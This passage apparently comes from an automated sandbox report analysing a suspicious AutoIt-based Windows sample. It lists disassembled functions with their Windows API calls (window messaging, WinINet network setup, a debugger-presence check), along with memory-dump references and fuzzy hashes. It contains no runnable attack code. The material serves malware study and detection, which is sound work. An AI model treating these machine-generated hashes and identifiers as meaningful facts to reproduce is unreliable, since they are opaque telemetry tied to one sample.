                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemorySleepStatus
                                                                      • String ID: @
                                                                      • API String ID: 2783356886-2766056989
                                                                      • Opcode ID: bac4a7fa71e966a6602821ca76fbb1835fde8bf81a4fb67fb048d39460869185
                                                                      • Instruction ID: 1d7311080420bc086890f101576d701f761cbda6c09f5d2dbd4f9585cbfc2269
                                                                      • Opcode Fuzzy Hash: bac4a7fa71e966a6602821ca76fbb1835fde8bf81a4fb67fb048d39460869185
                                                                      • Instruction Fuzzy Hash: 255114718087449BD320EF54DC86BABBBF8FBC4300F81885DF199411A5EB71956ACB67
                                                                      Function 00A45745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00A457E0
                                                                      • _wcslen.LIBCMT ref: 00A457EC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper_wcslen
                                                                      • String ID: CALLARGARRAY
                                                                      • API String ID: 157775604-1150593374
                                                                      • Opcode ID: 60937c6ce2115c08dab305585f7ab15a0a6ea77f550cdda66775b830199257f3
                                                                      • Instruction ID: 8fc7f7d4ed14c42ecda458320e2b2b44f0cb452f5c8448eeaae19606a60f3cc9
                                                                      • Opcode Fuzzy Hash: 60937c6ce2115c08dab305585f7ab15a0a6ea77f550cdda66775b830199257f3
                                                                      • Instruction Fuzzy Hash: 0D419275E002099FCB14EFB9C885ABEBBF5FF99324F104069E505A7252EB309D81DB90
                                                                      Function 00A3D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00A3D130
                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A3D13A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CrackInternet_wcslen
                                                                      • String ID: |
                                                                      • API String ID: 596671847-2343686810
                                                                      • Opcode ID: fcaf7a9d028674ff602d144c3d1ecf0a520a3910be1a1aed9544762b29b2d443
                                                                      • Instruction ID: 61c0a1de2d1b51bb44ecc876923b75b418ee522b01e49e9fa327a03b949d1924
                                                                      • Opcode Fuzzy Hash: fcaf7a9d028674ff602d144c3d1ecf0a520a3910be1a1aed9544762b29b2d443
                                                                      • Instruction Fuzzy Hash: C031F571D00209ABCF15EFA5DC85FEEBFB9FF45340F00011AF815A6166E631AA56CB61
                                                                      Function 00A5356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00A53621
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A5365C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DestroyMove
                                                                      • String ID: static
                                                                      • API String ID: 2139405536-2160076837
                                                                      • Opcode ID: 056c14e23beafd33fa66e4da3f593c9a35b3d4a2a6fdfdd176c0773fea3d87c0
                                                                      • Instruction ID: dd06020509e00acd2057dc61719bc3aa9d2cf086394f3c34abd483df9d3d1151
                                                                      • Opcode Fuzzy Hash: 056c14e23beafd33fa66e4da3f593c9a35b3d4a2a6fdfdd176c0773fea3d87c0
                                                                      • Instruction Fuzzy Hash: 65318B72100604AEDB10DF68DC80FBB73A9FF88761F10961DFCA597290DA30AD86DB60
                                                                      Function 00A54537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00A5461F
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A54634
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: '
                                                                      • API String ID: 3850602802-1997036262
                                                                      • Opcode ID: af35196d4b32341ab2cf54dba1c1887a84f4ae57f9854aecdd47c337538bff11
                                                                      • Instruction ID: 0fe4024e672451c5a890b9be6c8804c625a9ebc95896eef125c28fd956e7a760
                                                                      • Opcode Fuzzy Hash: af35196d4b32341ab2cf54dba1c1887a84f4ae57f9854aecdd47c337538bff11
                                                                      • Instruction Fuzzy Hash: 7E3118B4A0130AAFDB14CFA9C990BDA7BB5FF49305F14406AED05AB351E770A985CF90
                                                                      Function 00A531EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A5327C
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A53287
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Combobox
                                                                      • API String ID: 3850602802-2096851135
                                                                      • Opcode ID: 1e054631ab96b5c0eda77d5b4badd8c0f4a0904443cdacccd5f6ddca9b532d00
                                                                      • Instruction ID: e58708349fd3e7b4057e40bd8e79446cfe100a55909d230c709ba62b27e4950f
                                                                      • Opcode Fuzzy Hash: 1e054631ab96b5c0eda77d5b4badd8c0f4a0904443cdacccd5f6ddca9b532d00
                                                                      • Instruction Fuzzy Hash: 46119D723006087FEF219F94DC80EFF3B6AFBA83A5F104229F919A7290D6759D558760
                                                                      Function 00A53710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009C604C
                                                                        • Part of subcall function 009C600E: GetStockObject.GDI32(00000011), ref: 009C6060
                                                                        • Part of subcall function 009C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 009C606A
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00A5377A
                                                                      • GetSysColor.USER32(00000012), ref: 00A53794
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                      • String ID: static
                                                                      • API String ID: 1983116058-2160076837
                                                                      • Opcode ID: 128df34688ca146bd967afe703820b8e549f1f75ea2a936b70668a168fb790da
                                                                      • Instruction ID: 49d5ccef6947c9352fe2f7f14505064c62c8bf5808a089a28bc38190803cdba2
                                                                      • Opcode Fuzzy Hash: 128df34688ca146bd967afe703820b8e549f1f75ea2a936b70668a168fb790da
                                                                      • Instruction Fuzzy Hash: 951126B2A1020AAFDF00DFA8CC46EEA7BB8FB48355F004915FD56E2250E735E955DB60
                                                                      Function 00A3CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A3CD7D
                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A3CDA6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      • Opcode ID: 27e6e21814333f8754a21e4ae27cc93441bbefa5d28c3163b9ca191748c5c120
                                                                      • Instruction ID: cd85e3331dc0a5f86715f5985081d9e04a49c26a83cfab249a25daa632b81675
                                                                      • Opcode Fuzzy Hash: 27e6e21814333f8754a21e4ae27cc93441bbefa5d28c3163b9ca191748c5c120
                                                                      • Instruction Fuzzy Hash: D311C2B5205631BED7384B668C49EE7BEACEF127F4F00422AB109A3080D7749941D7F0
                                                                      Function 00A53429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00A534AB
                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A534BA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      • Opcode ID: 57f83cf12ff57cc984d31da7167704bd75913ca7e27bbb3e6db2375e7050e6f3
                                                                      • Instruction ID: c9b90657e301b163d6147612fc2112e3a7c8cfd2247eeef15d798b15db31a213
                                                                      • Opcode Fuzzy Hash: 57f83cf12ff57cc984d31da7167704bd75913ca7e27bbb3e6db2375e7050e6f3
                                                                      • Instruction Fuzzy Hash: EE118B72100208AFEF118FA49C40AAA376AFB843B6F504724FD61931D4C735DC9A9750
                                                                      Function 00A26C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00A26CB6
                                                                      • _wcslen.LIBCMT ref: 00A26CC2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: STOP
                                                                      • API String ID: 1256254125-2411985666
                                                                      • Opcode ID: a11be7230e3af0686cd3ebad85048125584d36036021b08cc9571b0f05ab33be
                                                                      • Instruction ID: d70c76a0aae0d6ca94551687efa28009d1f47a07c7d9d89f4629b2d6cb3d3c1b
                                                                      • Opcode Fuzzy Hash: a11be7230e3af0686cd3ebad85048125584d36036021b08cc9571b0f05ab33be
                                                                      • Instruction Fuzzy Hash: 1501D232A0193A8BCB21AFFDEC80ABF77B5FBA57147500539E86297195EB31D900C650
                                                                      Function 00A21CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                        • Part of subcall function 00A23CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A23CCA
                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A21D4C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 20eacb678fc82b65d0397a48854c09cdfddc6b78fb5669a7a6b59cc4268f8872
                                                                      • Instruction ID: 7ba8cc3cf23519f96ba421eaaa84ddc2ce6812869970d37e1af3c25e26276e03
                                                                      • Opcode Fuzzy Hash: 20eacb678fc82b65d0397a48854c09cdfddc6b78fb5669a7a6b59cc4268f8872
                                                                      • Instruction Fuzzy Hash: BF012871A00224ABCF08EFA8ED15EFE73A8FB62350B400929F872572C1EA3459088761
                                                                      Function 00A21BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                        • Part of subcall function 00A23CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A23CCA
                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00A21C46
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: de8e890a52b8cd2728ad694be6464840c80e453732e2d812a30faf444b49b622
                                                                      • Instruction ID: 1d06d3ded91c26974c075481abd95cc6c905dbbe97bbacd51629852fcc431166
                                                                      • Opcode Fuzzy Hash: de8e890a52b8cd2728ad694be6464840c80e453732e2d812a30faf444b49b622
                                                                      • Instruction Fuzzy Hash: 71018475A811187BCB08EBA4DA55FFF77A89B62340F140029A816772C1EA249E1886B2
                                                                      Function 00A21C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                        • Part of subcall function 00A23CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A23CCA
                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00A21CC8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 262b4a8ac51e2abb72cecefd0cfafc92aa9f80dca8c1a88b2bb123d8c9093104
                                                                      • Instruction ID: 92747c737c8893acd6f09a140d8b01a326b9e119c485a61e4961a1c44d586880
                                                                      • Opcode Fuzzy Hash: 262b4a8ac51e2abb72cecefd0cfafc92aa9f80dca8c1a88b2bb123d8c9093104
                                                                      • Instruction Fuzzy Hash: 8B01DB75E8012467CF04FBA8DB15FFE77A8AB21340F140439B80673281EA249F18C672
                                                                      Function 00A4747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: 3, 3, 16, 1
                                                                      • API String ID: 176396367-3042988571
                                                                      • Opcode ID: 7714bbd2e46d7a0f6c98c8d350a262fd84d77e299e8f94b10067f4d0e8ce3ae7
                                                                      • Instruction ID: 4d7e9763ef290122826587824e7a51617618e2bd12e80f50a0095166ecd7399b
                                                                      • Opcode Fuzzy Hash: 7714bbd2e46d7a0f6c98c8d350a262fd84d77e299e8f94b10067f4d0e8ce3ae7
                                                                      • Instruction Fuzzy Hash: BDE02B0A2042A0209232237A9CC1A7F5789DFC9B91710182BF981D6267EB94CD9193F1
                                                                      Function 00A20B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A20B23
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: AutoIt$Error allocating memory.
                                                                      • API String ID: 2030045667-4017498283
                                                                      • Opcode ID: df9a750eb4d4b273dd2817364c0389220e895c87022976f74b63c55d24d4c4d5
                                                                      • Instruction ID: 50c0d40225461533142dfa413d258859245f923c31fe07d594a0223415a95436
                                                                      • Opcode Fuzzy Hash: df9a750eb4d4b273dd2817364c0389220e895c87022976f74b63c55d24d4c4d5
                                                                      • Instruction Fuzzy Hash: A0E0D8312843183ED21037957C03F897F84EF09F61F10482BFB88955C38AE1685046A9
                                                                      Function 009E0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009DF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009E0D71,?,?,?,009C100A), ref: 009DF7CE
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,009C100A), ref: 009E0D75
                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,009C100A), ref: 009E0D84
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009E0D7F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 55579361-631824599
                                                                      • Opcode ID: 5b75aafe0e6aa728bc31748685febcb981067f1da01e762ba1becb88212d0939
                                                                      • Instruction ID: da159851db3c8b367d956c45d1b3a104a67ab89e9b91c9277624ab30d23e6cff
                                                                      • Opcode Fuzzy Hash: 5b75aafe0e6aa728bc31748685febcb981067f1da01e762ba1becb88212d0939
                                                                      • Instruction Fuzzy Hash: FEE06D702003418FD371EFB9E80578A7BE4BB40745F00892DE882C7695DBF0E889CBA1
                                                                      Function 00A1D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
